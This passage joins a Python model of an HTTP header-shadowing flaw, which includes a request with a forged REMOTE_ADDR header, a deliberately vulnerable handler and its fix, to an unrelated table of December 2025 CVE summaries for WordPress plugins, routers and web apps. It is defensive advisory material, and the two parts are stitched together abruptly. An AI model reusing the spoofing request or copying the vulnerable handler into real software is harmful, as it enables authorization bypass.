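CONNECTION_META = ("REMOTE_ADDR", "REMOTE_PORT", "LOCAL_ADDR", "LOCAL_PORT")

# Constructed raw request: the client supplies its own REMOTE_ADDR.
RAW_REQUEST = (
    "GET /admin HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "REMOTE_ADDR: 127.0.0.1\r\n"
    "User-Agent: curl/8.0\r\n"
    "\r\n"
)


class Headers:
    """Insertion-ordered multimap, standing in for std::multimap keyed by header name."""

    def __init__(self) -> None:
        self._entries: Dict[str, List[str]] = defaultdict(list)

    def emplace(self, name: str, value: str) -> None:
        self._entries[name].append(value)

    def erase(self, name: str) -> None:
        self._entries.pop(name, None)

    def get_header_value(self, name: str, default: str = "") -> str:
        # Mirrors get_header_value(key, id=0): the first stored entry wins.
        values = self._entries.get(name)
        return values[0] if values else default

    def count(self, name: str) -> int:
        return len(self._entries.get(name, []))


def read_headers(raw: str) -> Headers:
    """Parse header lines exactly as received; nothing is filtered at this stage."""
    headers = Headers()
    for line in raw.split("\r\n")[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers.emplace(name.strip(), value.strip())
    return headers


def process_request_vulnerable(raw: str, peer: Tuple[str, int]) -> Headers:
    """The described pre-0.27.0 behaviour: metadata appended after client headers."""
    headers = read_headers(raw)
    headers.emplace("REMOTE_ADDR", peer[0])
    headers.emplace("REMOTE_PORT", str(peer[1]))
    return headers


def process_request_fixed(raw: str, peer: Tuple[str, int]) -> Headers:
    """Hardened variant: drop client-supplied copies of the metadata names, then insert."""
    headers = read_headers(raw)
    for name in CONNECTION_META:
        headers.erase(name)
    headers.emplace("REMOTE_ADDR", peer[0])
    headers.emplace("REMOTE_PORT", str(peer[1]))
    return headers


def is_loopback_admin(headers: Headers) -> bool:
    """A downstream authorization check of the kind the advisory warns about."""
    return headers.get_header_value("REMOTE_ADDR") == "127.0.0.1"
```

The same shadowing affects any logger that reads these names to print a client address, which is the log-poisoning case in the advisory; the fix is the same, strip before insert, and a reverse proxy in front of the server should likewise overwrite rather than append its forwarding headers.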
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| adreastrian--WP Social Ninja Embed Social Feeds, Customer Reviews, Chat Widgets (Google Reviews, YouTube Feed, Photo Feeds, and More) | The WP Social Ninja - Embed Social Feeds, Customer Reviews, Chat Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.20.3 due to insufficient input sanitization and output escaping on externally-sourced content. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, granted they can post malicious content to a connected Google Business Profile or Facebook page. | 2025-12-02 | 6.1 | CVE-2025-13007 | https://www.wordfence.com/threat-intel/vulnerabilities/id/16c9ed4a-9e9f-4f10-b3fd-7f0db2c86112?source=cve https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Services/Platforms/Reviews/GoogleMyBusiness.php#L308 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Views/public/reviews-templates/elements/review-content.php#L7 https://plugins.trac.wordpress.org/browser/wp-social-reviews/tags/3.20.1/app/Services/Helper.php#L19 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3397264%40wp-social-reviews%2Ftrunk&old=3392979%40wp-social-reviews%2Ftrunk&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3400414%40wp-social-reviews%2Ftrunk&old=3397264%40wp-social-reviews%2Ftrunk&sfp_email=&sfph_mail= |
| ADSLR--B-QE2W401 | A vulnerability was detected in ADSLR B-QE2W401 250814-r037c. Affected by this issue is the function parameterdel_swifimac of the file /send_order.cgi. Performing manipulation of the argument del_swifimac results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13797 | VDB-333808 | ADSLR B-QE2W401 send_order.cgi parameterdel_swifimac command injection VDB-333808 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691838 | Adslr B-QE2W401 250814-r037c Remote code execution https://www.notion.so/2a60c75766a88027a6aec07b378332a8 |
| ADSLR--NBR1005GPEV2 | A flaw has been found in ADSLR NBR1005GPEV2 250814-r037c. This affects the function ap_macfilter_add of the file /send_order.cgi. Executing manipulation of the argument mac can lead to command injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13798 | VDB-333809 | ADSLR NBR1005GPEV2 send_order.cgi ap_macfilter_add command injection VDB-333809 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691841 | Adslr NBR1005GPEV2 250814-r037c Remote code execution https://www.notion.so/2a60c75766a8805a8973d2ff6a6bcb26 |
| ADSLR--NBR1005GPEV2 | A vulnerability has been found in ADSLR NBR1005GPEV2 250814-r037c. This vulnerability affects the function ap_macfilter_del of the file /send_order.cgi. The manipulation of the argument mac leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13799 | VDB-333810 | ADSLR NBR1005GPEV2 send_order.cgi ap_macfilter_del command injection VDB-333810 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691842 | Adslr NBR1005GPEV2 250814-r037c Remote code execution https://www.notion.so/2a60c75766a8801e8e4bdd3be8072d9d |
| ADSLR--NBR1005GPEV2 | A vulnerability was found in ADSLR NBR1005GPEV2 250814-r037c. This issue affects the function set_mesh_disconnect of the file /send_order.cgi. The manipulation of the argument mac results in command injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13800 | VDB-333811 | ADSLR NBR1005GPEV2 send_order.cgi set_mesh_disconnect command injection VDB-333811 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691942 | Adslr NBR1005GPEV2 250814-r037c Remote code execution https://www.notion.so/2a70c75766a88023aa0ed833ff0239e1 |
| alexkar--ARK Related Posts | The ARK Related Posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 2.19. This is due to missing or incorrect nonce validation on the ark_rp_options_page function. This makes it possible for unauthenticated attackers to modify the plugin's configuration settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-13684 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7eb53a80-89e5-4d8c-a1ba-c272196a3340?source=cve https://plugins.trac.wordpress.org/browser/ark-relatedpost/trunk/ark-relatedpost.php#L109 https://plugins.trac.wordpress.org/browser/ark-relatedpost/tags/2.19/ark-relatedpost.php#L109 |
| AMTT--Hotel Broadband Operation System | A security flaw has been discovered in AMTT Hotel Broadband Operation System 1.0. This affects an unknown part of the file /manager/card/cardmake_down.php. Performing manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 4.7 | CVE-2025-14090 | VDB-334480 | AMTT Hotel Broadband Operation System cardmake_down.php sql injection VDB-334480 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #696460 | Anmei Century (Beijing) Technology Co., Ltd. Hotel Broadband Operation System v1.0 SQL Injection https://github.com/CHENZHUANGLIN/cve/issues/2 |
| anastis--CSSIgniter Shortcodes | The CSSIgniter Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'element' shortcode attribute in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-03 | 6.4 | CVE-2025-13448 | https://www.wordfence.com/threat-intel/vulnerabilities/id/288419ad-fbb2-4a4a-8a40-89ae024e068d?source=cve https://plugins.trac.wordpress.org/browser/cssigniter-shortcodes/trunk/ci-shortcodes.php#L117 https://plugins.trac.wordpress.org/browser/cssigniter-shortcodes/tags/2.4.1/ci-shortcodes.php#L117 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3408092%40cssigniter-shortcodes&new=3408092%40cssigniter-shortcodes&sfp_email=&sfph_mail= |
| apptainer--apptainer | Apptainer is an open source container platform. In Apptainer versions less than 1.4.5, a container can disable two of the forms of the little-used --security option, in particular the forms --security=apparmor:<profile> and --security=selinux:<label>, which otherwise put restrictions on operations that containers can do. The --security option has always been mentioned in Apptainer documentation as being a feature for the root user, although these forms do also work for unprivileged users on systems where the corresponding feature is enabled. AppArmor is enabled by default on Debian-based distributions and SELinux is enabled by default on RHEL-based distributions, but on SUSE it depends on the distribution version. This vulnerability is fixed in 1.4.5. | 2025-12-02 | 4.5 | CVE-2025-65105 | https://github.com/apptainer/apptainer/security/advisories/GHSA-j3rw-fx6g-q46j https://github.com/opencontainers/runc/security/advisories/GHSA-cgrx-mc8f-2prm https://github.com/sylabs/singularity/security/advisories/GHSA-wwrx-w7c9-rf87 https://github.com/apptainer/apptainer/pull/3226 https://github.com/apptainer/apptainer/commit/4313b42717e18a4add7dd7503528bc15af905981 https://github.com/apptainer/apptainer/commit/82f17900a0c31bc769bf9b4612d271c7068d8bf2 |
| ArcadeAI--arcade-mcp | Arcade MCP allows you to create, deploy, and share MCP servers. Prior to 1.5.4, the arcade-mcp HTTP server uses a hardcoded default worker secret ("dev") that is never validated or overridden during normal server startup. As a result, any unauthenticated attacker who knows this default key can forge valid JWTs and fully bypass the FastAPI authentication layer. This grants remote access to all worker endpoints, including tool enumeration and tool invocation, without credentials. This vulnerability is fixed in 1.5.4. | 2025-12-02 | 6.5 | CVE-2025-66454 | https://github.com/ArcadeAI/arcade-mcp/security/advisories/GHSA-g2jx-37x6-6438 https://github.com/ArcadeAI/arcade-mcp/pull/691 https://github.com/ArcadeAI/arcade-mcp/commit/44660d18ceb220600401303df860a31ca766c817 |
| arnabkumar--Cute News Ticker | The Cute News Ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'color' shortcode attribute in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13656 | https://www.wordfence.com/threat-intel/vulnerabilities/id/92f53507-4475-401b-b57c-f6652a868be9?source=cve https://wordpress.org/plugins/cute-news-ticker/ https://plugins.trac.wordpress.org/browser/cute-news-ticker/trunk/main-function.php#L60 https://plugins.trac.wordpress.org/browser/cute-news-ticker/tags/1.0/main-function.php#L60 |
| ays-pro--Photo Gallery by Ays Responsive Image Gallery | The Photo Gallery by Ays plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.4.8. This is due to missing nonce verification on the bulk action functionality in the 'process_bulk_action()' function. This makes it possible for unauthenticated attackers to perform bulk operations (delete, publish, or unpublish galleries) via a forged request granted they can trick an administrator into performing an action such as clicking on a link. | 2025-12-02 | 4.3 | CVE-2025-13685 | https://www.wordfence.com/threat-intel/vulnerabilities/id/42a14820-710d-4149-9a8d-aa84479f0980?source=cve https://plugins.trac.wordpress.org/browser/gallery-photo-gallery/trunk/includes/lists/class-gallery-photo-gallery-list-table.php#L1060 https://plugins.trac.wordpress.org/browser/gallery-photo-gallery/tags/6.4.7/includes/lists/class-gallery-photo-gallery-list-table.php#L1060 https://plugins.trac.wordpress.org/changeset/3404625/gallery-photo-gallery/tags/6.4.9/includes/lists/class-gallery-photo-gallery-list-table.php?old=3402336&old_path=gallery-photo-gallery%2Ftags%2F6.4.8%2Fincludes%2Flists%2Fclass-gallery-photo-gallery-list-table.php |
| beaverbuilder--Beaver Builder Page Builder Drag and Drop Website Builder | The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.9.4. This is due to insufficient capability checks in the REST API endpoints under the 'fl-controls/v1' namespace that control site-wide Global Presets. This makes it possible for authenticated attackers with contributor-level access and above to add, modify, or delete global color and background presets that affect all Beaver Builder content site-wide. | 2025-12-02 | 4.3 | CVE-2025-11726 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b797e141-a9d2-48c4-a44e-a59a80a90a5b?source=cve https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L53 https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/trunk/classes/class-fl-controls.php#L252 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406987%40beaver-builder-lite-version&new=3406987%40beaver-builder-lite-version&sfp_email=&sfph_mail= |
| beaverbuilder--Beaver Builder Page Builder Drag and Drop Website Builder | The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.9.4. This is due to the plugin not properly verifying a user's authorization in the disable() function. This makes it possible for authenticated attackers, with contributor level access and above, to disable the Beaver Builder layout on arbitrary posts and pages, causing content integrity issues and layout disruption on those pages. | 2025-12-04 | 4.3 | CVE-2025-12782 | https://www.wordfence.com/threat-intel/vulnerabilities/id/710ed734-ca98-4ab3-82d5-359e683ee062?source=cve https://plugins.trac.wordpress.org/changeset/3406987/beaver-builder-lite-version |
| bigmaster--Payaza | The Payaza plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_nopriv_update_order_status' AJAX endpoint in all versions up to, and including, 0.3.8. This makes it possible for unauthenticated attackers to update order statuses. | 2025-12-05 | 5.3 | CVE-2025-12355 | https://www.wordfence.com/threat-intel/vulnerabilities/id/acc88688-76e0-4477-8b7c-eeff541881ab?source=cve https://wordpress.org/plugins/payaza/ |
| breadbutter--Bread & Butter: Gate content & Improve lead conversion in 60 seconds | The Bread & Butter: Gate content + Capture leads + Collect first-party data + Nurture with Ai agents plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.10.1321. This is due to missing or incorrect nonce validation on the uploadImage() function. This makes it possible for unauthenticated attackers to upload arbitrary files that make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-12189 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bb280004-e0ba-44c8-a205-8fec30900d86?source=cve https://plugins.trac.wordpress.org/browser/bread-butter/trunk/src/Base/Ajax.php#L411 https://github.com/d0n601/CVE-2025-12189 https://ryankozak.com/posts/cve-2025-12189/ |
| cgrymala--List Attachments Shortcode | The List Attachments Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before_list' parameter in the [list-attachments] shortcode in all versions up to, and including, 0.4.1a due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-12717 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a67b4ec2-b337-478f-aaaa-2ce19c4deb4c?source=cve https://plugins.trac.wordpress.org/browser/list-attachments-shortcode/tags/0.6a/class-list-attachments-shortcode.php#L47 https://plugins.trac.wordpress.org/browser/list-attachments-shortcode/tags/0.6a/class-list-attachments-shortcode.php#L85 |
| CKSource--CKFinder | In CKSource CKFinder before 2.5.0.1 for ASP.NET, authenticated users could download any file from the server if the correct path to a file was provided. | 2025-12-05 | 5 | CVE-2016-20023 | https://download.cksource.com/CKFinder/CKFinder%20for%20ASP.NET/2.5.0.1/ |
| code-projects--Employee Profile Management System | A vulnerability was determined in code-projects Employee Profile Management System 1.0. This vulnerability affects unknown code of the file /view_personnel.php. Executing manipulation of the argument per_id can lead to SQL injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-07 | 6.3 | CVE-2025-14193 | VDB-334613; code-projects Employee Profile Management System view_personnel.php SQL injection VDB-334613; CTI Indicators (IOB, IOC, TTP, IOA); Submit #699245: code-projects Employee Profile Management System published November 15, 2025 SQL Injection https://github.com/shenxianyuguitian/employee-management-SQL https://code-projects.org/ |
| code-projects--Employee Profile Management System | A security flaw has been discovered in code-projects Employee Profile Management System 1.0. Impacted is an unknown function of the file /profiling/add_file_query.php. The manipulation of the argument per_file results in unrestricted upload. The attack may be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-07 | 6.3 | CVE-2025-14195 | VDB-334615; code-projects Employee Profile Management System add_file_query.php unrestricted upload VDB-334615; CTI Indicators (IOB, IOC, TTP, IOA); Submit #699247: code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload https://github.com/shenxianyuguitian/employee-management-UFU https://code-projects.org/ |
| code-projects--Question Paper Generator | A flaw has been found in code-projects Question Paper Generator up to 1.0. This vulnerability affects unknown code of the file /selectquestionuser.php. This manipulation of the argument subid causes SQL injection. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2025-12-07 | 6.3 | CVE-2025-14203 | VDB-334646; code-projects Question Paper Generator selectquestionuser.php SQL injection VDB-334646; CTI Indicators (IOB, IOC, TTP, IOA); Submit #700153: code-projects Question Paper 1.0 SQL Injection https://github.com/asd1238525/cve/blob/main/SQL17.md https://code-projects.org/ |
| codeconfig--CodeConfig Accessibility | The Accessiy By CodeConfig Accessibility plugin for WordPress is vulnerable to unauthorized page creation due to missing authorization checks in versions up to, and including, 1.0.0. This is due to the plugin not performing capability checks in the `Settings::createPage()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary published pages on the site via the `ccpcaCreatePage` AJAX action. | 2025-12-06 | 5.3 | CVE-2025-13358 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fe324d4d-eb52-4eeb-ad91-072a6e84d9ba?source=cve https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/tags/1.0.0/includes/Ajax/Settings.php#L96 https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax/Settings.php#L96 https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/tags/1.0.0/includes/Ajax.php#L24 https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax.php#L24 |
| codeconfig--CodeConfig Accessibility | The Accessiy By CodeConfig Accessibility - Easy One-Click Accessibility Toolbar That Truly Matters plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.0.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers with subscriber-level access and above to modify the plugin's global accessibility settings. | 2025-12-06 | 4.3 | CVE-2025-13309 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f3344e72-1dd6-45ec-b699-d755589a1566?source=cve https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax/Settings.php#L23 https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax.php#L19 https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Enqueue.php#L135 |
| codejunkie--Clik stats | The Clik stats plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-04 | 6.1 | CVE-2025-13513 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8a047313-fdbc-47fa-912a-a624033bbce1?source=cve https://plugins.trac.wordpress.org/browser/clikstats/trunk/ck_admin.php#L47 https://plugins.trac.wordpress.org/browser/clikstats/tags/0.8/ck_admin.php#L47 |
| CODESYS--CODESYS PLCHandler | An unauthenticated remote attacker, who beats a race condition, can exploit a flaw in the communication servers of the CODESYS Control runtime system on Linux and QNX to trigger an out-of-bounds read via crafted socket communication, potentially causing a denial of service. | 2025-12-01 | 5.9 | CVE-2025-41739 | https://certvde.com/de/advisories/VDE-2025-099 |
| contentstudio--ContentStudio | The ContentStudio plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.7. This is due to missing or insufficient nonce validation on the add_cstu_settings function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-13144 | https://www.wordfence.com/threat-intel/vulnerabilities/id/047fd07c-ab07-49bf-8a94-8ae33c92f93e?source=cve https://plugins.trac.wordpress.org/browser/contentstudio/tags/1.3.7/contentstudio-plugin.php#L380 https://plugins.trac.wordpress.org/browser/contentstudio/tags/1.3.7/contentstudio-plugin.php#L383 |
| d3395--CryptX | The CryptX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `cryptx` shortcode in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-13739 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2f8cb7d7-eb40-403e-85de-c16200ee424d?source=cve https://plugins.trac.wordpress.org/browser/cryptx/tags/4.0.4/classes/CryptX.php#L149 https://plugins.trac.wordpress.org/browser/cryptx/tags/4.0.4/classes/CryptX.php#L237 https://plugins.trac.wordpress.org/browser/cryptx/tags/4.0.4/classes/CryptX.php#L604 https://plugins.trac.wordpress.org/browser/cryptx/tags/4.0.4/classes/CryptX.php#L1295 |
| danrajkumar--Nouri.sh Newsletter | The Nouri.sh Newsletter plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` parameter in all versions up to, and including, 1.0.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13515 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d5f0587e-1f84-472c-8fb7-13ddda63e2ec?source=cve https://plugins.trac.wordpress.org/browser/newsletters-from-rss-to-email-newsletters-using-nourish/trunk/templates/options.phtml#L7 https://plugins.trac.wordpress.org/browser/newsletters-from-rss-to-email-newsletters-using-nourish/tags/v1.0.13/templates/options.phtml#L7 |
| Datateam Information Technologies Inc.--Datactive | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting'), Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Datateam Information Technologies Inc. Datactive allows Stored XSS. This issue affects Datactive: from 2.13.34 before 2.14.0.6. | 2025-12-02 | 4.8 | CVE-2025-13505 | https://www.usom.gov.tr/bildirim/tr-25-0424 |
| dayrui--XunRuiCMS | A security flaw has been discovered in dayrui XunRuiCMS up to 4.7.1. Affected is an unknown function of the file /admind45f74adbd95.php?c=email&m=add of the component Email Setting Handler. Performing manipulation results in server-side request forgery. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 4.7 | CVE-2025-14004 | VDB-334246; dayrui XunRuiCMS Email Setting admind45f74adbd95.php server-side request forgery VDB-334246; CTI Indicators (IOB, IOC, IOA); Submit #692907: Sichuan Xunrui Cloud Software Development Co., Ltd xunruicms <=4.7.1 Server-Side Request Forgery https://github.com/24-2021/vul/blob/main/xunruicms-email_test-SSRF/xunruicms-email_test-SSRF.md |
| dayrui--XunRuiCMS | A flaw has been found in dayrui XunRuiCMS up to 4.7.1. This vulnerability affects unknown code of the file admin79f2ec220c7e.php?c=api&m=test_site_domain of the component Project Domain Change Test. This manipulation of the argument v causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 4.7 | CVE-2025-14008 | VDB-334250; dayrui XunRuiCMS Project Domain Change Test admin79f2ec220c7e.php server-side request forgery VDB-334250; CTI Indicators (IOB, IOC, IOA); Submit #692915: Sichuan Xunrui Cloud Software Development Co., Ltd x <=4.7.1 Server-Side Request Forgery https://github.com/24-2021/vul/blob/main/xunruicms-test_site_domain-SSRF/xunruicms-test_site_domain-SSRF.md |
| delabon--Live Sales Notification for Woocommerce Woomotiv | The Live Sales Notification for Woocommerce - Woomotiv plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'woomotiv_limit' parameter in all versions up to, and including, 3.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-06 | 6.1 | CVE-2025-13137 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19257e49-addb-4882-af5f-8de0d90a4a86?source=cve https://wordpress.org/plugins/woomotiv/ |
| devsoftbaltic--SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity | The SurveyJS: Drag & Drop WordPress Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.12.20. This is due to missing nonce validation on the SurveyJS_DeleteSurvey AJAX action. This makes it possible for unauthenticated attackers to delete surveys via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-02 | 4.3 | CVE-2025-13140 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5d96ea1b-1763-4a54-bd67-ac29175e9e01?source=cve https://plugins.trac.wordpress.org/browser/surveyjs/tags/1.12.20/ajax_handlers/delete_survey.php#L12 https://plugins.trac.wordpress.org/changeset/3403869/surveyjs/trunk/ajax_handlers/delete_survey.php |
| dojodigital--Live CSS Preview | The Live CSS Preview plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_frontend_save' AJAX endpoint in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's css setting. | 2025-12-05 | 4.3 | CVE-2025-12354 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3ebaadf6-5085-4f2d-a377-34e318351449?source=cve https://wordpress.org/plugins/live-css-preview/ |
| dripadmin--CRM Memberships | The CRM Memberships plugin for WordPress is vulnerable to unauthorized membership tag creation due to a missing capability check on the 'ntzcrm_add_new_tag' function in all versions up to, and including, 2.5. This makes it possible for unauthenticated attackers to create arbitrary membership tags and modify CRM configuration that should be restricted to administrators. | 2025-12-05 | 5.3 | CVE-2025-13312 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f61b9de5-5c37-4efb-ad1c-006e9fc05bc2?source=cve https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L828 https://plugins.trac.wordpress.org/browser/crm-memberships/tags/2.5/includes/class/class-ntzcrm-api.php#L14 |
| duddi--Image Optimizer by wps.sk | The Image Optimizer by wps.sk plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.0. This is due to missing or incorrect nonce validation on the imagopby_ajax_optimize_gallery() function. This makes it possible for unauthenticated attackers to trigger bulk optimization via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-12190 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d321183a-f0ef-4b5b-855a-da95edb610b9?source=cve https://plugins.trac.wordpress.org/browser/image-optimizer-wpssk/tags/1.2.0/image-optimizer-wpssk.php https://plugins.svn.wordpress.org/image-optimizer-wpssk/tags/1.2.0/image-optimizer-wpssk.php |
| Edimax--BR-6478AC V3 | A security vulnerability has been detected in Edimax BR-6478AC V3 1.0.15. This issue affects the function sub_416898 of the file /boafrm/formDebugDiagnosticRun. The manipulation of the argument host leads to OS command injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 4.7 | CVE-2025-14092 | VDB-334482; Edimax BR-6478AC V3 formDebugDiagnosticRun sub_416898 OS command injection VDB-334482; CTI Indicators (IOB, IOC, TTP, IOA); Submit #696632: EDIMAX BR-6478AC V3 1.0.15 Remote command execution https://github.com/Kriswu1337/CVE/blob/main/EDIMAX/1/1.md |
| Edimax--BR-6478AC V3 | A vulnerability was detected in Edimax BR-6478AC V3 1.0.15. Impacted is the function sub_416990 of the file /boafrm/formTracerouteDiagnosticRun. The manipulation of the argument host results in OS command injection. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 4.7 | CVE-2025-14093 | VDB-334483; Edimax BR-6478AC V3 formTracerouteDiagnosticRun sub_416990 OS command injection VDB-334483; CTI Indicators (IOB, IOC, TTP, IOA); Submit #696633: EDIMAX BR-6478AC V3 1.0.15 Remote command execution https://github.com/Kriswu1337/CVE/blob/main/EDIMAX/1/2.md |
| Edimax--BR-6478AC V3 | A flaw has been found in Edimax BR-6478AC V3 1.0.15. The affected element is the function sub_44CCE4 of the file /boafrm/formSysCmd. This manipulation of the argument sysCmd causes OS command injection. The attack may be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 4.7 | CVE-2025-14094 | VDB-334484; Edimax BR-6478AC V3 formSysCmd sub_44CCE4 OS command injection VDB-334484; CTI Indicators (IOB, IOC, TTP, IOA); Submit #696668: EDIMAX BR-6478AC V3 1.0.15 Remote command execution https://github.com/Kriswu1337/CVE/blob/main/EDIMAX/1/3.md |
